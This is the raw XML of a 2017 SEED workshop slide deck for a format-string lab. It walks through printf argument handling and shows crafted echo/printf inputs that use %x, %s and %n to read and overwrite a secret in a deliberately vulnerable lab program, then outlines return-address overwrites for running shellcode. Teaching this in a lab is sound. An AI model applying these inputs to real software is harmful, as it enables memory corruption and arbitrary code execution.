            <a:off x="311700" y="421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 Secret - Construct Input to Observe Distance (Screen shot)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echo $(printf “\x1c\xb0\x04\x08").%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x |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address is 0xbffff2e0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variable secret's value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secret[0]'s address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secret[1]'s address is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 804b01c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�.bffff2e8.1.b7eb8309.bffff30f.bffff30e.0.bffff3f4.804b018.804b008.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804b01c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.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e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600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 528"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434975" y="3901600"/>
            <a:ext cx="1752300" cy="3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Distance is 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="529" name="Shape 529"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5555450" y="3466925"/>
            <a:ext cx="411600" cy="44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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701100" y="3443850"/>
            <a:ext cx="6477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- Construct Input to Print &amp; Modify secret[1]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Construct input for vulnerable program using echo and printf commands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</a:rPr>
              <a:t>(use distance 10):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&lt;use echo and printf commands to construct input&gt; | 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./vul_prog_no_integer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Conversion Specifiers to Use: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marL="457200" lvl="0" indent="-31750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Char char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print secret[1]:	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%x, %s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-31750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Char char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify secret[1]: 	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%x, %n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 Input to Print secret[1]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echo $(printf "\x1c\xb0\x04\x08").%x.%x.%x.%x.%x.%x.%x.%x.%x.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%s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|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0xbffff2e0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0x 804b01c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�.bffff2e8.1.b7eb8309.bffff30f.bffff30e.0.bffff3f4.804b018.804b008.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Provide Input to Modify secret[1]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$(printf "\x1c\xb0\x04\x08").%x.%x.%x.%x.%x.%x.%x.%x.%x.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%n</a:t>
            </a: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| vul_prog_no_integer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address is 0xbffff2f0 (on stack)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variable secret's value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secret[0]'s address is 0x 804b018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secret[1]'s address is 0x 804b01c (on heap)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Please enter a string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�.bffff2f8.1.b7eb8309.bffff31f.bffff31e.0.bffff404.804b018.804b008.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original secrets: 0x44 -- 0x55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new secrets:  	0x44 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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0x46</a:t>
            </a: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50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Example - Variable Arguments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int printf(const char *format, ...);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i=1, j=2, k=3;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printf("Hello World \n");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one number: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one number: 1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two numbers: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two numbers: 1 2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three numbers: %d,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j, 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Format String to Execute ShellCode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To execute shellcode, attacker must change Return Address to shellcode’s address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Recall Buffer Overflow Attack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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert shellcode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Overflow Return Address to point to shellcode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Format String vulnerability allows use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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to modify memory contents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Format String to Execute ShellCode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Input to a vulnerable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printf()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> function can include: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Shellcode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Format string to modify return address contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>%n can be used to modify memory contents of Return Address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%n has variants: %hn and %hhn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>%hn can write 2 bytes and %hhn can write 1 byte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7" name="Shape 5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72" y="1138462"/>
            <a:ext cx="5210449" cy="29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printf() Example - Variable Arguments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int printf(const char *format, ...);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i=1, j=2, k=3;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printf("Hello World \n");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one number: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one number: 1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two numbers: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two numbers: 1 2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printf("Print three numbers: %d, %d, %d\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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i, j, k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); → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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three numbers: 1 2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printf() Argument Access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id=100, age=25; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-6985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char *name = "Bob Smith";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printf("\n ID: %d, Name: %s, Age: %d\n", id, name, age);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3854</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>623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Courier New</vt:lpstr>
      <vt:lpstr>Proxima Nova</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>simple-light-2</vt:lpstr>
      <vt:lpstr>Format String Lab </vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>printf() function</vt:lpstr>
      <vt:lpstr>printf() Example - Variable Arguments</vt:lpstr>
      <vt:lpstr>printf() Example - Variable Arguments</vt:lpstr>
      <vt:lpstr>printf() Example - Variable Arguments</vt:lpstr>
      <vt:lpstr>printf() Example - Variable Arguments</vt:lpstr>
      <vt:lpstr>printf() Example - Variable Arguments</vt:lpstr>
      <vt:lpstr>printf() Argument Access</vt:lpstr>
      <vt:lpstr>printf() Argument Access</vt:lpstr>
      <vt:lpstr>printf() Argument Access</vt:lpstr>
      <vt:lpstr>printf() Argument Access - Two Pointers</vt:lpstr>
      <vt:lpstr>printf() Argument Access - Two Pointers</vt:lpstr>
      <vt:lpstr>printf() Argument Access - Pointer Movement</vt:lpstr>
      <vt:lpstr>printf() Argument Access - Pointer Movement</vt:lpstr>
      <vt:lpstr>printf() - Missing Arguments</vt:lpstr>
      <vt:lpstr>printf() - Missing Arguments</vt:lpstr>
      <vt:lpstr>printf() - Format String Vulnerability</vt:lpstr>
      <vt:lpstr>printf() - Format String Vulnerability</vt:lpstr>
      <vt:lpstr>Vulnerable Program Snippet</vt:lpstr>
      <vt:lpstr>Vulnerable Program Snippet</vt:lpstr>
      <vt:lpstr>Vulnerable Program Snippet</vt:lpstr>
      <vt:lpstr>Vulnerable Program Snippet</vt:lpstr>
      <vt:lpstr>Vulnerable Program Snippet - Stack Layout </vt:lpstr>
      <vt:lpstr>Compile Vulnerable Program</vt:lpstr>
      <vt:lpstr>Run Vulnerable Program </vt:lpstr>
      <vt:lpstr>Run Vulnerable Program</vt:lpstr>
      <vt:lpstr>Run Vulnerable Program</vt:lpstr>
      <vt:lpstr>Tasks</vt:lpstr>
      <vt:lpstr>Crash Program</vt:lpstr>
      <vt:lpstr>Crash Program - Stack</vt:lpstr>
      <vt:lpstr>Crash Program - Provide Input</vt:lpstr>
      <vt:lpstr>Crash Program - Provide Input</vt:lpstr>
      <vt:lpstr>Print Secret</vt:lpstr>
      <vt:lpstr>Print Secret</vt:lpstr>
      <vt:lpstr>Print Secret - Steps</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Distance for Integer Input</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Distance for Integer Input</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Distance for Integer Input</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Secret Address</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Secret Address</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Secret Address</vt:lpstr>
      <vt:lpstr>Print Secret - Construct Input</vt:lpstr>
      <vt:lpstr>Print Secret - Convert Hex Address to Decimal </vt:lpstr>
      <vt:lpstr>Print Secret - Provide Input</vt:lpstr>
      <vt:lpstr>Print Secret - Provide Input</vt:lpstr>
      <vt:lpstr>Modify Secret</vt:lpstr>
      <vt:lpstr>Modify Secret - Provide Input</vt:lpstr>
      <vt:lpstr>Modify Secret - Provide Input</vt:lpstr>
      <vt:lpstr>Modify Secret - Control Value Written Using Widths</vt:lpstr>
      <vt:lpstr>Modify Secret - Control Value Written Using Widths</vt:lpstr>
      <vt:lpstr>Modify Secret - Provide Input</vt:lpstr>
      <vt:lpstr>Modify Secret - Provide Input</vt:lpstr>
      <vt:lpstr>Vulnerable Program with No Integer Input</vt:lpstr>
      <vt:lpstr>Print Secret - Stack Layout</vt:lpstr>
      <vt:lpstr>Compile Program</vt:lpstr>
      <vt:lpstr>Construct User Input using echo and printf Commands</vt:lpstr>
      <vt:lpstr>Command Substitution using echo and printf - Example</vt:lpstr>
      <vt:lpstr>Print Secret - Steps</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Address</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Address</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Address</vt:lpstr>
      <vt:lpstr>Print Secret - Observe Address </vt:lpstr>
      <vt:lpstr>Print Secret - Construct Input to Observe Distance</vt:lpstr>
      <vt:lpstr>Print Secret - Construct Input to Observe Distance</vt:lpstr>
      <vt:lpstr>Print Secret - Construct Input to Observe Distance (Screen shot)</vt:lpstr>
      <vt:lpstr>Task - Construct Input to Print &amp; Modify secret[1]</vt:lpstr>
      <vt:lpstr>Provide Input to Print secret[1]</vt:lpstr>
      <vt:lpstr>Provide Input to Modify secret[1]</vt:lpstr>
      <vt:lpstr>Using Format String to Execute ShellCode</vt:lpstr>
      <vt:lpstr>Using Format String to Execute ShellCode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String Lab SEED Workshop 2017</dc:title>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-28T18:39:02Z</dcterms:modified>
</cp:coreProperties>
</file>